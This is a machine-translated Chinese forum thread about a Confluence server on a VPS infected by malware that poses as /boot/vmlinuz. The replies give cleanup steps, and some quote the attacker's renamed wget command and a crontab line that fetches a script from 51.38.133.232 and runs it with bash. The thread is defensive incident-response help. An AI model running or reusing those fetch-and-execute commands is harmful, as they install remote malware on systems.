我正在VPS上运行Jira和Confluence实例(和nginx反向代理)。目前,我不能出于某种原因开始汇合,我认为这是其他事情的结果。
我检查了进程列表:
运行confluence
进程的/boot/vmlinuz
用户吃了CPU。如果我kill -9
这个过程几秒后再次启动。
重启后的VPS:
/boot/vmlinuz
流程开始。我从自动启动中删除了Confluence,但没关系。
所以我的问题:
/boot/vmlinuz
过程?我从来没有见过这个。 (是的,我知道,vmlinuz是内核)谢谢你的回答
它是由黑客造成的。如果找到/tmp/seasame
文件,则表示您的服务器已被感染。它使用cron下载此文件。我删除了/tmp
文件夹中的文件,杀死了所有进程,禁用了confluence用户的cron,并更新了Confluence。
你的服务器看起来像黑客。请仔细查看流程列表。例如运行ps auxc
并查看进程二进制源。
您可以使用像rkhunter这样的工具来扫描您的服务器,但一般情况下,您应该在开始时杀死所有已经作为汇合用户进行搜索的内容,扫描您的服务器/帐户,升级您的汇合(在大多数情况下是用户确定的攻击源),并查看在你的汇合中为其他帐户等
您是否希望了解该过程中的内容,请查看/ proc,例如在ls -la /proc/996
。你也会看到源二进制文件。您也可以在strace -ff -p 996
吃午餐以查看正在进行的过程或cat /proc/996/exe | strings
以查看二进制文件的字符串。这可能是某种僵尸网络部分,矿工等。
我有同样的问题,它被黑了,病毒脚本在/ tmp,从命令“top”找到脚本名称(无意义的字母,名称“fcbk6hj”是我的。)并杀死进程(可能是3个进程)
根3158 1 0 15:18? 00:00:01 ./fcbk6hj ./jd8CKgl root 3159 1 0 15:18? 00:00:01 ./fcbk6hj ./5CDocHl root 3160 1 0 15:18? 00:00:11 ./fcbk6hj ./prot
杀死所有这些并删除/ tmp / prot,并杀死/ boot / vmlinuz,CPU的进程。
我发现病毒已经自动将脚本下载到/ tmp,我的方法是mv wgetak到其他名称。
病毒行为:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
发现以下任务是用crontab编写的,只需删除它:* / 5 * * * * / usr / bin / wgetak -q -O / tmp / seasame http://51.38.133.232:80 && bash / tmp / seasame
从系统和crontab中删除它后,也许是好主意(至少现在)将汇合用户添加到/etc/cron.deny
。
之后:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
我也同时遇到了同样的问题,也许这是一个汇合错误。我只是杀了汇合过程,它没事。